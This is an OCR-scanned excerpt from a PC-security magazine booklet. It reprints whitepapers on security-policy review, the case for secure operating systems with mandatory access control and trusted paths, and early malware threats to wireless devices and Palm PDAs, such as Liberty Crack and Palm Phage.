department  review  the  procedures  for  gathering  evidence  and 
involvement  of  the  authorities.  Such  a review  increases  the  effec- 
tiveness of  the  evidence  in  legal  proceedings.  If  the  violation  was 
internal  in  nature,  contact  your  Human  Resources  department. 
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Restoration:  Restoration  of  normal  network  operations  is  the  final 
goal  of  any  security  violation  response.  Define  in  the  security  pol- 
icy how  you  conduct,  secure,  and  make  available  normal  backups. 
As  each  system  has  its  own  means  and  procedures  for  backing  up, 
the  security  policy  should  act  as  a meta-policy,  detailing  for  each 
system  the  security  conditions  that  require  restoration  from  back- 
up. If  approval  is  required  before  restoration  can  be  done,  include 
the  process  for  obtaining  approval  as  well. 

Review:  The  review  process  is  the  final  effort  in  creating  and  main- 
taining a security  policy.  There  are  three  things  you’ll  need  to 
review:  policy,  posture,  and  practice.  The  security  policy  should  be  a 
living  document  that  adapts  to  an  ever-changing  environment. 
Reviewing  the  existing  policy  against  known  Best  Practices  keeps 
the  network  up  to  date.  Also,  check  the  CERT  Web  site 
(http://www.cert.org)  for  useful  tips,  practices,  security  improve- 
ments, and  alerts  that  can  be  incorporated  into  your  security  policy. 

You  should  also  review  the  network’s  posture  in  comparison 
with  the  desired  security  posture.  An  outside  firm  that  specialises 
in  security  can  attempt  to  penetrate  the  network  and  test  not  only 
the  posture  of  the  network,  but  the  security  response  of  your 
organisation  as  well.  For  high-availability  networks,  it’s  recom- 
mended to  conduct  such  a test  annually. 

Finally,  practice  is  defined  as  a drill  or  test  of  the  support  staff 
to  insure  that  they  have  a clear  understanding  of  what  to  do  dur- 
ing a security  violation.  Often,  this  drill  is  unannounced  by  man- 
agement and  done  in  conjunction  with  the  network  posture  test. 
This  review  identifies  gaps  in  procedures  and  training  of  person- 
nel so  that  corrective  action  can  be  taken. 


IV.  The  Need  For  Secure  Operating  Systems 

Source:  “The  Inevitability  of  Failure:  The  Flawed  Assumption  of  Security  in 
Modern  Computing  Environments” 
available  at 

http://jya.com/paperFl.htm 


SEE  FAST  TRACK 


111 


VI 


Whitepapers 


VIRUS-PROOF  YOUR  PC 


Public  awareness  of  the  need  for  security  in  computing  systems  is 
growing  as  critical  services  are  becoming  increasingly  dependent 
on  interconnected  computing  systems.  National  infrastructure 
components  such  as  the  electric  power,  telecommunication  and 
transportation  systems  can  no  longer  function  without  networks 
of  computers.  The  advent  of  the  World  Wide  Web  has  especially 
increased  public  concern  for  security.  Security  is  the  primary  con- 
cern of  businesses  that  want  to  use  the  Internet  for  commerce  and 
maintaining  business  relationships. 

The  increased  awareness  of  the  need  for  security  has  resulted 
in  an  increase  of  efforts  to  add  security  to  computing  environ- 
ments. However,  these  efforts  suffer  from  the  flawed  assumption 
that  security  can  adequately  be  provided  in  application  space 
without  certain  security  features  in  the  operating  system.  In  real- 
ity, operating  system  security  mechanisms  play  a critical  role  in 
supporting  security  at  higher  levels.  Yet  today,  debate  persists  in 
the  research  community  as  to  what  role  operating  systems  should 
play  in  secure  systems.  The  computer  industry  has  not  accepted 
the  critical  role  of  the  operating  system  to  security,  as  evidenced 
by  the  inadequacies  of  the  basic  protection  mechanisms  provided 
by  current  mainstream  operating  systems. 

The  necessity  of  operating  system  security  to  overall  system 
security  is  undeniable;  the  underlying  operating  system  is  respon- 
sible for  protecting  application-space  mechanisms  against  tam- 
pering, bypassing,  and  spoofing  attacks.  If  it  fails  to  meet  this 
responsibility,  system-wide  vulnerabilities  will  result. 

The  need  for  secure  operating  systems  is  especially  crucial  in 
today’s  computing  environment.  Substantial  increases  in  con- 
nectivity and  data  sharing  have  increased  the  risk  to  systems 
such  that  even  a careful  and  knowledgeable  user  running  on  a 
single-user  system  is  no  longer  safe  from  the  threat  of  malicious 
code.  Because  the  distinction  between  data  and  code  is  vanish- 
ing, malicious  code  maybe  introduced,  without  a conscious  deci- 
sion on  the  part  of  a user  to  install  executable  code,  whenever 
data  is  imported  into  the  system.  For  example,  malicious  code 
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could  be  introduced  with  a Java  applet  or  by  viewing  apparently 
benign  data  that,  in  actuality,  contains  executable  code.  More  so 
than  ever,  secure  operating  systems  are  needed  to  protect  against 
this  threat. 

Here,  we  identify  some  features  of  secure  operating  systems 
that  are  necessary  to  protect  application-space  security  mecha- 
nisms yet  are  lacking  in  mainstream  operating  systems.  They  form 
the  ‘missing  link’  of  security.  Although  this  section  only  deals 
with  features,  it  is  important  to  note  that  features  alone  are  inad- 
equate. Assurance  evidence  must  be  provided  to  demonstrate  that 
the  features  meet  the  desired  system  security  properties  and  to 
demonstrate  that  the  features  are  implemented  correctly. 
Assurance  is  the  ultimate  missing  link;  although  approaches  to 
providing  assurance  may  be  controversial,  the  importance  of 
assurance  is  undeniable. 

Mandatory  Security 

An  operating  system’s  mandatory  security  policy  may  be  divided 
into  several  kinds  of  policies,  such  as  an  access  control  policy,  an 
authentication  usage  policy,  and  a cryptographic  usage  policy.  A 
mandatory  access  control  policy  specifies  how  subjects  may  access 
objects  under  the  control  of  the  operating  system.  A mandatory 
authentication  usage  policy  specifies  what  authentication  mecha- 
nisms must  be  used  to  authenticate  a principal  to  the  system.  A 
mandatory  cryptographic  usage  policy  specifies  what  crypto- 
graphic mechanisms  must  be  used  to  protect  data.  Additionally, 
various  subsystems  of  the  operating  system  may  have  their  own 
mechanism  usage  policies.  These  subsystem  specific  usage  policies 
maybe  dependent  on  the  cryptographic  usage  policy.  For  example, 
a network  usage  policy  for  a router  might  specify  that  sensitive 
network  traffic  should  be  protected  using  IPSEC  ESP  in  tunnelling 
mode  prior  to  being  sent  to  an  external  network.  The  selection  of 
a cryptographic  algorithm  for  IPSEC  ESP  may  be  deferred  to  the 
cryptographic  usage  policy. 

A secure  system  must  provide  a framework  for  defining  the 
operating  system’s  mandatory  security  policy  and  translating  it  to 
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a form  interpretable  by  the  underlying  mandatory  security  mech- 
anisms of  the  operating  system.  Without  such  a framework,  there 
can  be  no  real  confidence  that  the  mandatory  security  mecha- 
nisms will  provide  the  desired  security  properties.  An  operating 
system  that  provides  mandatory  security  may  nonetheless  suffer 
from  the  presence  of  high-bandwidth  covert  channels.  This  is  an 
issue  whenever  the  mandatory  security  policy  is  concerned  with 
confidentiality.  This  should  not,  however,  be  a reason  to  ignore 
mandatory  security.  Even  with  covert  channels,  an  operating  sys- 
tem with  basic  mandatory  controls  improves  security  by  increas- 
ing the  required  sophistication  of  the  adversary. 

Once  systems  with  basic  mandatory  controls  become  main- 
stream, covert  channel  exploitation  will  become  more  common 
and  public  awareness  of  the  need  to  address  covert  channels  in 
computing  systems  will  increase. 

In  any  system  that  supports  mandatory  security,  some  applica- 
tions require  special  privileges  in  the  mandatory  policy  in  order  to 
perform  some  security-relevant  function.  Such  applications  are 
frequently  called  trusted  applications  because  they  are  trusted  to 
correctly  perform  some  security-related  function  and  because  they 
are  trusted  to  not  misuse  privileges  required  in  order  to  perform 
that  function.  If  the  mandatory  security  mechanisms  of  a secure 
operating  system  only  support  coarse-grained  privileges,  then  the 
security  of  the  overall  system  may  devolve  to  the  security  of  the 
trusted  applications  on  the  system.  To  reduce  the  dependency  on 
trusted  applications,  the  mandatory  security  mechanisms  of  an 
operating  system  should  be  designed  to  support  the  principle  of 
least  privilege. 

Type  enforcement  is  an  example  of  a mandatory  security 
mechanism  that  may  be  used  both  to  limit  trusted  applications  to 
the  minimal  set  of  privileges  required  for  their  function  and  to 
confine  the  damage  caused  by  any  misuse  of  these  privileges. 

The  mandatory  security  mechanisms  of  an  operating  system 
may  be  used  to  support  security-related  functionality  in  applica- 
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tions  by  rigorously  ensuring  that  subsystems  are  unbypassable  and 
tamperproof.  For  example,  type  enforcement  may  be  used  to  imple- 
ment assured  pipelines  to  provide  these  properties.  An  assured 
pipeline  ensures  that  data  flowing  from  a designated  source  to  a 
designated  destination  must  pass  through  a security-related  subsys- 
tem and  ensures  the  integrity  of  the  subsystem.  Many  of  the  securi- 
ty requirements  of  these  applications  may  be  ensured  by  the  under- 
lying mandatory  security  mechanisms  of  the  operating  system. 

Operating  system  mandatory  security  mechanisms  may  also  be 
used  to  rigorously  confine  an  application  to  a unique  security 
domain  that  is  strongly  separated  from  other  domains  in  the  sys- 
tem. Applications  may  still  misbehave,  but  the  resulting  damage 
can  now  be  restricted  to  within  a single  security  domain.  This  con- 
finement property  is  critical  to  controlling  data  flows  in  support 
of  a system  security  policy.  In  addition  to  supporting  the  safe  exe- 
cution of  untrustworthy  software,  confinement  may  support  func- 
tional requirements,  such  as  an  isolated  testing  environment  in 
an  insulated  development  environment. 

Although  one  could  attempt  to  enforce  a mandatory  security 
policy  through  discretionary  security  mechanisms,  such  mecha- 
nisms can  not  defend  against  careless  or  malicious  users.  Since  dis- 
cretionary security  mechanisms  place  the  burden  for  security  on 
the  individual  users,  carelessness  by  any  one  user  at  any  point  in 
time  may  lead  to  a violation  of  the  mandatory  policy.  In  contrast, 
mandatory  security  mechanisms  limit  the  burden  to  the  system 
security  policy  administrator.  With  only  discretionary  mecha- 
nisms, a malicious  user  with  access  to  sensitive  data  and  applica- 
tions may  directly  release  sensitive  information  in  violation  of  the 
mandatory  policy.  Although  that  same  user  may  also  be  able  to 
leak  sensitive  information  in  ways  that  do  not  involve  the  com- 
puting system,  the  ability  to  leak  the  information  through  the 
computing  system  may  increase  the  bandwidth  of  the  leak  and 
may  decrease  its  traceability.  In  contrast,  with  mandatory  security 
mechanisms,  he  may  only  leak  sensitive  information  through 
covert  channels,  which  limits  the  bandwidth  and  increases 
accountability,  if  covert  channels  are  audited. 
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Furthermore,  even  with  users  who  are  benign  and  careful,  the 
mandatory  security  policy  may  still  be  subverted  by  flawed  or 
malicious  applications  when  only  discretionary  mechanisms  are 
used  to  enforce  it.  The  distinction  between  flawed  and  malicious 
software  is  not  particularly  important  in  this  paper.  In  either  case, 
an  application  may  fail  to  apply  security  mechanisms  required  by 
the  mandatory  policy  or  may  use  security  mechanisms  in  a way 
that  is  inconsistent  with  the  user’s  intent.  Mandatory  security 
mechanisms  may  be  used  to  ensure  that  security  mechanisms  are 
applied  as  required  and  can  protect  the  user  against  inadvertent 
execution  of  untrustworthy  applications. 

Although  the  user  may  have  carefully  defined  the  discre- 
tionary policy  to  properly  implement  the  mandatory  policy, 
an  application  may  change  the  discretionary  policy  without 
the  user’s  approval  or  knowledge.  In  contrast,  the  mandatory 
policy  may  only  be  changed  by  the  system  security  policy 
administrator. 

In  the  case  of  personal  computing  systems,  where  the  user  may 
be  the  system  security  policy  administrator,  mandatory  security 
mechanisms  are  still  helpful  in  protecting  against  flawed  or  mali- 
cious software.  In  the  simplest  case,  where  there  is  only  a distinc- 
tion between  the  user’s  ordinary  role  and  the  user’s  role  as  system 
security  policy  administrator,  the  mandatory  security  mecha- 
nisms can  protect  the  user  against  unintentional  execution  of 
untrustworthy  software.  With  a further  subdivision  of  the  user’s 
ordinary  role  into  various  roles  based  on  function,  mandatory 
security  mechanisms  can  confine  the  damage  that  may  be  caused 
by  flawed  or  malicious  software. 

Although  there  are  a number  of  commercial  operating  systems 
with  support  for  mandatory  security,  none  of  these  systems  have 
become  mainstream.  These  systems  have  suffered  from  a fixed 
notion  of  mandatory  security,  thereby  limiting  their  market 
appeal.  Furthermore,  these  systems  typically  lack  adequate  sup- 
port for  constraining  trusted  applications.  In  order  to  reach  a 
wider  market,  operating  systems  must  support  a more  general 
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notion  of  mandatory  security  and  must  support  flexible  configu- 
ration of  mandatory  policies. 

Mainstream  commercial  operating  systems  rarely  support  the 
principle  of  least  privilege  even  in  their  discretionary  access  con- 
trol architecture.  Many  operating  systems  only  provide  a distinc- 
tion between  a completely  privileged  security  domain  and  a com- 
pletely unprivileged  security  domain.  Even  in  Microsoft  Windows 
NT,  the  privilege  mechanism  fails  to  adequately  protect  against 
malicious  programs  because  it  does  not  limit  the  privileges  that  a 
program  inherits  from  the  invoking  process  based  on  the  trust- 
worthiness of  the  program. 

Current  microkernel-based  research  operating  systems  have 
tended  to  focus  on  providing  primitive  protection  mechanisms 
which  may  be  used  to  flexibly  construct  a higher-level  security 
architecture.  Many  of  these  systems  use  kernel-managed  capabili- 
ties as  the  underlying  protection  mechanism.  However,  typical 
capability  architectures  are  inadequate  for  supporting  mandatory 
access  controls  with  a high  degree  of  flexibility  and  assurance. 
Flask,  a variant  of  the  Fluke  microkernel,  provides  a mandatory 
security  framework  similar  to  that  of  DTOS,  a variant  of  the  Mach 
microkernel;  both  systems  provide  mechanisms  for  mandatory 
access  control  and  a mandatory  policy  framework. 

Trusted  Paths 

A trusted  path  is  a mechanism  by  which  a user  may  directly  inter- 
act with  trusted  software,  which  can  only  be  activated  by  either 
the  user  or  the  trusted  software  and  may  not  be  imitated  by  other 
software.  In  the  absence  of  a trusted  path  mechanism,  malicious 
software  may  impersonate  trusted  software  to  the  user  or  may 
impersonate  the  user  to  trusted  software.  Such  malicious  software 
could  potentially  obtain  sensitive  information,  perform  functions 
on  behalf  of  the  user  in  violation  of  the  user’s  intent,  or  trick  the 
user  into  believing  that  a function  has  been  invoked  without  actu- 
ally invoking  it.  In  addition  to  supporting  trusted  software  in  the 
base  system,  the  trusted  path  mechanism  should  be  extensible  to 
support  the  subsequent  addition  of  trusted  applications  by  a sys- 
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tem  security  policy  administrator. 

The  concept  of  a trusted  path  can  be  generalised  to  include  inter- 
actions beyond  just  those  between  trusted  software  and  users.  The 
TNI  introduces  the  concept  of  a trusted  channel  for  communication 
between  trusted  software  on  different  network  components.  More 
generally,  a mechanism  that  guarantees  a mutually  authenticated 
channel,  or  protected  path,  is  necessary  to  ensure  that  critical  system 
functions  are  not  being  spoofed.  Although  a protected  path  mecha- 
nism for  local  communications  could  be  constructed  in  application 
space  without  direct  authentication  support  in  the  operating  sys- 
tem, it  is  preferable  for  an  operating  system  to  provide  its  own  pro- 
tected path  mechanism  since  such  a mechanism  will  be  simpler  to 
assure  and  is  likely  to  be  more  efficient. 

Most  mainstream  commercial  operating  systems  are  utterly 
lacking  in  their  support  for  either  a trusted  path  mechanism  or  a 
protected  path  mechanism.  Microsoft  Windows  NT  does  provide  a 
trusted  path  for  a small  set  of  functions  such  as  login  authentica- 
tion and  password  changing  but  lacks  support  for  extending  the 
trusted  path  mechanism  to  other  trusted  applications.  For  local 
communications,  NT  does  provide  servers  with  the  identity  of  their 
clients;  however,  it  does  not  provide  the  server  identity  to  the  client. 

General  Examples 

Without  operating  system  support  for  mandatory  security  and 
trusted  path,  application  space  mechanisms  for  access  control  and 
cryptography  cannot  be  implemented  securely. 

Access  Control:  An  application-space  access  control  mechanism 
may  be  decomposed  into  an  enforcer  component  and  a decider 
component.  When  a subject  attempts  to  access  an  object  protected 
by  the  mechanism,  the  enforcer  component  must  invoke  the 
decider  component,  supplying  it  with  the  proper  input  parame- 
ters for  the  policy  decision,  and  must  enforce  the  returned  deci- 
sion. A common  example  of  the  required  input  parameters  is  the 
security  attributes  of  the  subject  and  the  object.  The  decider  com- 
ponent may  also  consult  other  external  sources  in  order  to  make 
the  policy  decision.  For  example,  it  may  use  an  external  policy 
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database  and  system  information  such  as  the  current  time.  If  a 
malicious  agent  can  tamper  with  any  of  the  components  in  the 
access  control  mechanism  or  with  any  inputs  to  the  decision,  then 
the  malicious  agent  can  subvert  the  access  control  mechanism. 
Even  if  the  components  and  all  of  the  inputs  are  collocated  within 
a single  file,  the  operating  system  security  mechanisms  are  still 
relied  upon  to  protect  the  integrity  of  that  file.  As  discussed,  only 
mandatory  security  mechanisms  can  rigorously  provide  such 
integrity  guarantees. 

Even  with  strong  integrity  guarantees  for  the  policy  decision 
inputs,  if  an  authorised  user  invokes  malicious  software,  the 
malicious  software  could  change  an  object’s  security  attributes 
or  the  policy  database’s  rules  without  the  user’s  knowledge  or 
consent.  The  access  control  mechanism  requires  a trusted  path 
mechanism  in  the  operating  system  in  order  to  ensure  that  arbi- 
trary propagation  of  access  cannot  occur  without  explicit  autho- 
risation by  a user. 

If  a malicious  agent  can  impersonate  the  decider  component 
to  the  enforcer  component,  or  if  a malicious  agent  can  imperson- 
ate any  source  of  inputs  to  the  decision,  then  the  malicious  agent 
can  subvert  the  mechanism.  If  any  of  the  components  or  external 
decision  input  sources  are  not  collocated  within  a single  applica- 
tion, then  the  access  control  mechanism  requires  a protected  path 
mechanism.  If  a malicious  agent  can  bypass  the  enforcer  compo- 
nent, then  it  may  trivially  subvert  the  access  control  mechanism. 
Mandatory  security  mechanisms  in  the  operating  system  may  be 
used  to  ensure  that  all  accesses  to  the  protected  objects  are  medi- 
ated by  the  enforcer  component. 

Cryptography:  An  analysis  of  application-space  cryptography 
may  be  decomposed  into  an  analysis  of  the  invocation  of  the  cryp- 
tographic mechanism  and  an  analysis  of  the  cryptographic  mech- 
anism itself.  As  an  initial  basis  for  discussion,  suppose  that  the 
cryptographic  mechanism  is  a hardware  token  that  implements 
the  necessary  cryptographic  functions  correctly  and  that  there  is 
a secure  means  by  which  the  cryptographic  keys  are  established  in 
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the  token.  Even  in  this  simplified  case,  where  the  confidentiality 
and  integrity  of  algorithms  and  keys  is  achieved  without  operat- 
ing system  support,  we  will  demonstrate  that  there  are  still  vul- 
nerabilities which  may  only  be  effectively  addressed  with  the  fea- 
tures of  a secure  operating  system. 

One  vulnerability  in  this  simplified  case  is  that  invocation  of 
the  token  cannot  be  guaranteed.  Any  legitimate  attempt  to  use  the 
token  might  not  result  in  a call  to  the  token.  The  application  that 
performs  the  cryptographic  invocation  might  be  bypassed  or  mod- 
ified by  malicious  applications  or  malicious  users.  Malicious  appli- 
cations might  impersonate  the  cryptographic  token  to  the  invok- 
ing application.  Mandatory  security  and  protected  path  features 
in  the  operating  system  address  this  vulnerability.  Mandatory 
security  mechanisms  may  be  used  to  ensure  that  the  application 
that  invokes  the  cryptographic  token  is  unbypassable  and  tamper- 
proof against  both  malicious  software  and  malicious  users. 
Unbypassability  could  also  be  achieved  by  using  an  inline  crypto- 
graphic token,  which  is  physically  interposed  between  the  sender 
of  the  data  to  be  protected  and  the  receiver  of  the  protected  data; 
however,  this  would  be  less  flexible.  A protected  path  mechanism 
may  be  used  to  ensure  that  malicious  software  cannot  imperson- 
ate the  cryptographic  token  to  the  invoking  application.  Misuse  of 
the  cryptographic  token  is  a second  vulnerability  in  the  simplified 
case.  Misuse  may  involve  the  use  of  a service,  algorithm,  session  or 
key  by  an  unauthorised  application.  Without  operating  system 
support  for  identifying  callers,  a cryptographic  token  can  do  little 
more  than  require  that  a user  activate  it,  after  which,  any  service, 
algorithm,  session  or  key  authorised  for  that  user  may  be  used  by 
any  application  on  the  system.  In  this  case,  the  cryptographic 
token  maybe  misused  by  applications  operating  on  behalf  of  other 
users  or  may  be  misused  by  malicious  software  operating  on 
behalf  of  the  authorised  user. 

Furthermore,  unless  the  cryptographic  token  has  a direct  phys- 
ical interface  for  user  activation,  malicious  software  can  spoof  the 
token  to  the  user,  obtain  authentication  information,  and  subse- 
quently activate  the  cryptographic  token  without  the  user’s 
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knowledge  or  consent.  Even  with  a direct  physical  interface  to  the 
user,  it  is  impractical  for  the  cryptographic  token  to  require  user 
confirmation  for  every  cryptographic  operation. 

This  second  vulnerability  may  be  addressed  through  mandato- 
ry security,  trusted  path  and  protected  path  features  in  the  oper- 
ating system.  A trusted  path  mechanism  obviates  the  need  for  a 
separate  physical  interface  for  activation.  A protected  path  mech- 
anism permits  the  cryptographic  token  to  identify  its  callers  and 
enforce  fine-grained  controls  over  the  use  of  services,  algorithms, 
sessions  and  keys.  As  an  alternative  to  having  the  token  deal  with 
fine-grained  controls  over  its  usage,  mandatory  security  mecha- 
nisms may  also  be  used  to  provide  such  controls.  For  example, 
mandatory  security  mechanisms  may  be  used  to  isolate  the  token 
for  use  only  by  applications  executed  by  the  user  who  activated  the 
token.  Furthermore,  the  mandatory  security  mechanisms  can 
reduce  the  risk  of  malicious  software  being  able  to  use  the  cryp- 
tographic token  and  may  consequently  limit  the  use  of  the  trusted 
path  mechanism  to  highly  sensitive  actions. 

Hence,  even  in  the  simplest  case,  the  features  of  a secure  oper- 
ating system  are  crucial  to  addressing  the  vulnerabilities  of  appli- 
cation-space cryptography.  In  the  remainder  of  this  section,  the 
assumptions  of  the  simplified  case  are  removed,  and  the  addition- 
al vulnerabilities  are  examined. 

If  the  assumption  that  initial  keys  are  securely  established 
within  the  token  is  removed,  then  there  is  the  additional  vulnera- 
bility that  the  initial  keys  may  be  observed  or  modified  by  an 
unauthorised  entity.  Unless  the  initial  keys  are  provided  via  a ded- 
icated physical  interface  to  the  cryptographic  token,  the  operating 
system  must  protect  the  path  between  the  initial  key  source  and 
the  cryptographic  token  and  may  need  to  protect  the  initial  key 
source  itself.  Mandatory  security  mechanisms  may  be  used  to  rig- 
orously protect  the  path  and  the  key  source.  A trusted  path  may  be 
required  for  initial  keying. 

If  the  assumption  that  the  cryptographic  mechanism  is  con- 
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fined  to  a single  hardware  token  is  removed  and  implemented  in 
software  instead,  the  confidentiality  and  integrity  of  the  crypto- 
graphic mechanism’s  code  and  data  becomes  dependent  on  the 
operating  system,  including  both  memory  protection  and  file  pro- 
tection. Mandatory  security  is  needed  to  rigorously  ensure  the 
mechanism’s  integrity  and  confidentiality.  If  any  external  inputs, 
such  as  input  parameters  to  a random  number  generator,  are  used 
by  the  cryptographic  mechanism,  the  input  sources  and  the  path 
between  the  input  sources  and  the  cryptographic  mechanism 
must  be  protected  with  mandatory  security  mechanisms. 

System  Security:  No  single  technical  security  solution  can  pro- 
vide total  system  security;  a proper  balance  of  security  mecha- 
nisms must  be  achieved.  Each  security  mechanism  provides  spe- 
cific security  functions  and  should  be  designed  to  only  provide 
those  functions.  It  should  rely  on  other  mechanisms  for  support 
and  for  required  security  services.  In  a secure  system,  the  entire  set 
of  mechanisms  complement  each  other  so  that  they  collectively 
provide  a complete  security  package.  Systems  that  fail  to  achieve 
this  balance  will  be  vulnerable. 

A secure  operating  system  is  an  important  and  necessary  piece 
to  the  total  system  security  puzzle,  but  it  is  not  the  only  piece.  A 
highly  secure  operating  system  would  be  insufficient  without 
application-specific  security  built  upon  it.  Certain  problems  are 
actually  better  addressed  by  security  implemented  above  the  oper- 
ating system.  One  such  example  is  an  electronic  commerce  system 
that  requires  a digital  signature  on  each  transaction.  A applica- 
tion-space cryptographic  mechanism  in  the  transaction  system 
protected  by  secure  operating  system  features  might  offer  the  best 
system  security  solution. 

No  single  security  mechanism  is  likely  to  provide  complete  pro- 
tection. Unsolved  technical  problems,  implementation  errors  and 
flawed  environmental  assumptions  will  result  in  residual  vulner- 
abilities. As  an  example,  covert  channels  remain  a serious  techni- 
cal challenge  for  secure  operating  system  designers.  These  limita- 
tions must  be  understood,  and  suitable  measures  must  be  taken  to 
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deploy  complementary  mechanisms  designed  to  compensate  for 
such  problems.  In  the  covert  channel  example,  auditing  and  detec- 
tion mechanisms  should  be  utilised  to  minimise  the  chances  that 
known  channels  are  exploited.  In  turn,  these  should  depend  on 
secure  operating  systems  to  protect  their  critical  components, 
such  as  audit  logs  and  intrusion  sensors,  because  they  are  subject 
to  the  same  types  of  vulnerabilities  as  those  discussed  elsewhere 
here. 

Virus  And  Malicious  Code  Protection  For 
Wireless  Devices 

Source:  “Virus  and  Malicious  Code  Protection  for  Wireless  Devices” 
available  at 

http://download.antivirus.com/ftp/white/wireless_protection02280l.doc 

Although  malicious  code  has  yet  to  cause  serious  damage  or  incur 
substantial  costs  in  the  wireless  arena,  such  code  seen  in  the  lab 
and,  in  some  cases,  in  the  real  world,  has  indicated  that  this  unde- 
sirable code  has  the  potential  for  serious  disruption  to  the  wireless 
infrastructure.  As  the  line  between  cellular  phones  and  personal 
digital  assistants  blurs,  the  enhanced  functionality  of  the  wireless 
devices  that  emerge  offers  a playground  for  hackers  and  e-van- 
dals— in  much  the  same  way  that  each  new  medium  emerging  in 
the  last  two  decades  has  offered  such  an  opportunity. 

The  world  is  going  mobile.  While  the  lack  of  affordable  mobile 
phone  service  is  a fairly  recent  memory  for  many  consumers, 
today,  most  consumers  take  for  granted  the  ability  to  communi- 
cate with  friends  and  family  anywhere,  anytime,  at  a reasonable 
cost.  At  the  same  time,  mobility  is  the  watchword  today  in  busi- 
ness. Global  prosperity  and  an  even  faster  pace  of  business  are 
driving  the  desire  for  employees,  partners,  and  customers  to  be 
able  to  communicate,  without  regard  for  location. 

Yet  increasingly  today,  mobility  has  a different  face.  The  abili- 
ty to  transmit  and  receive  wireless  data  is  enabling  an  entirely 
new  type  of  business.  M-commerce,  perhaps  initially  visualised  by 
many  as  the  teenager  purchasing  a soda  using  a cell  phone  in  a 
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recent  television  commercial,  is  becoming  the  new  way  to  pur- 
chase goods  and  services,  transfer  funds,  and  perform  other  types 
of  wireless  transactions. 

The  migration  from  simple  voice  communication  to  data  com- 
munication is  underway  in  earnest.  According  to  Cahners  In-Stat 
Group2,  the  most  successful  wireless  data  system  is  the  short  mes- 
sage service  (SMS)  on  Global  System  for  Mobile  Communications 
(GSM)  networks.  Cahners  points  out  that  in  a single  month  early 
this  year,  users  sent  8 billion  SMS  messages  worldwide. 
Interestingly,  for  many  users  in  some  parts  of  the  world  (including 
most  notably,  Japan),  the  wireless  device  is  the  most  prevalent 
mode  of  accessing  the  Internet,  compared  to  PC  Internet  access. 
More  than  200  million  SMS  subscribers  already  dot  the  globe,  and 
Cahners  projected  742  million  worldwide  wireless  Internet  sub- 
scribers in  2004  and  607  million  SMS  subscribers  in  the  same  year. 

Overview  of  Threats  and  Potential  Damage 

Yet,  like  each  new  communication  and  computing  medium  before 
it,  wireless  voice  and  data  communication  presents  the  opportu- 
nity for  less  desirable  applications.  The  rapid  spread  of  wireless 
communications  presents  new  opportunities  for  hackers,  disgrun- 
tled employees,  and  others  to  prove  their  prowess  in  spreading 
viruses  and  malicious  code. 

On  the  surface,  the  vulnerability  of  wireless  devices  to  viruses 
and  malicious  code  threats  appears  to  follow  the  same  patterns  of 
vulnerabilities  that  the  wired  world  has  experienced.  Yet,  upon 
closer  inspection,  the  vulnerabilities  are  more  numerous  and  com- 
plex. Such  threats  can  be  categorised  into  three  groups: 

o Application-based  threats 
o Content-based  threats 

o Mixed  threats  (a  power-packed  combination  of  application  and 
content-based  threats  not  yet  seen  in  the  real  world) 

Application-based  Threats 

In  the  wireless  world,  application-based  threats  are  posed  by  exe- 
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cutable  malicious  code  that  latches  on  to  existing,  or  new,  wireless 
applications.  Application-based  threats  are  potentially  present 
anytime  a software  program  is  downloaded  to,  or  executed  on,  a 
wireless  device  particularly  when  the  program  is  downloaded  or 
received  from  an  unknown  source.  In  the  wired  world,  these 
threats  are  roughly  analogous  to  the  early  viruses  borne  by  exe- 
cutable programs  (which  were  later  superseded  by  the  rise  in 
Macro  viruses— malicious  code  borne  by  non-executable  files). 

The  first  malicious  application-based  program  that  specifically 
targeted  the  Palm  operating  system  (OS)  used  in  Palm  Pilot  per- 
sonal digital  assistants  (PDAs)  was  called  ‘Liberty  Crack’.  The  free 
software,  which  could  be  downloaded  from  a Web  site  or  accessed 
via  Internet  relay  chat  (IRC)  rooms,  pretended  to  convert  the  share- 
ware Liberty  Game  Boy  program  into  a registered  version.  When 
the  program  was  executed,  the  user  was  not  aware  that,  in  the 
background,  the  program  was  deleting  all  executable  applications 
in  the  handheld  device.  Liberty  Crack  did  not  affect  the  underly- 
ing Palm  operating  system  or  the  embedded  applications. 

Liberty  Crack  and  similar  ‘Trojan  horses’  are  likely  to  spread  very 
slowly  ‘in  the  wild’  (i.e.,  in  the  real  world)  and  represent  a relatively 
low  threat.  Liberty  Crack  is  designated  a Trojan  horse  as  it  mas- 
querades with  one  purpose,  while  harbouring  a surprise  purpose 
(similar  to  the  Trojan  horse  of  ancient  Greece  in  which  soldiers  hid 
inside  a hollow  wooden  horse  presented  as  a gift  by  the  Trojans). 

While  actual  incidences  of  Liberty  Crack  have  not  been 
encountered  in  the  wild,  this  Trojan  horse  is  significant  in  its 
proof  of  concept— demonstrating  that  malicious  code  can  be 
downloaded  and  may  adversely  impact  PDAs.  Many  analysts  have 
labelled  Liberty  Crack,  which  first  made  news  in  late  August  2000, 
as  a harbinger  of  more  malicious  code  to  come.  For  example, 
future  wireless  Trojans  could  steal  data  such  as  address  book  infor- 
mation, portal  passwords,  and  other  confidential  information. 

An  independent  developer  for  Palm  computers,  know  as 
“Ardiri,”  assumed  credit  for  designing  Liberty  Crack,  saying  its  orig- 


HEE  FAST  TRACK 


125 


VI 


Whitepapers 


VIRUS-PROOF  YOUR  PC 


inal  purpose  was  to  clean  up  redundant  data  files.  After  providing 
the  program  to  a few  friends,  Ardiri  witnessed  its  proliferation 
within  the  Palm  developer  community,  which  then  numbered 
about  80,000.  Seeing  that  he  may  have  caused  a problem,  he  post- 
ed warnings  about  Liberty  Crack  on  various  Palm  developer  sites. 

This  evolution  and  proliferation  of  the  Trojan  horse  raises 
two  key  aspects  of  application-based  threats.  First,  it  illustrates 
the  potential  for  proliferation  of  malicious  code,  especially  in 
the  form  of  a Trojan,  when  it  is  disguised  as  a program  with  per- 
ceived value  that  is  offered  for  free.  Second,  this  early  case 
reminds  us  that  operating  systems  in  widest  use  are  likely  to  be 
the  initial  playgrounds  of  writers  of  malicious  code.  The  large 
number  of  shareware  applications  available  and  the  growing 
number  of  legitimate  code  developers  in  the  community 
increases  the  likelihood  of  malicious  behaviour.  Further,  the 
large  number  of  possible  affected  users  raises  the  potential  pro- 
file of  any  malicious  activity— an  enticement  for  those  seeking 
the  limelight  for  destructive  activities. 

Since  the  discovery  of  Liberty  Crack,  antivirus  experts  such  as 
Trend  Micro  have  been  tracking  a number  of  other  application- 
based,  potentially  destructive  Palm  programs,  including  Palm 
Phage— the  first  known  virus  designed  to  affect  Palm  PDAs.  First 
seen  about  one  month  after  Liberty,  Palm  Phage  infects  all  third- 
party  application  programs  when  executed.  Instead  of  running 
normally,  infected  executable  files  infect  other  third-party  appli- 
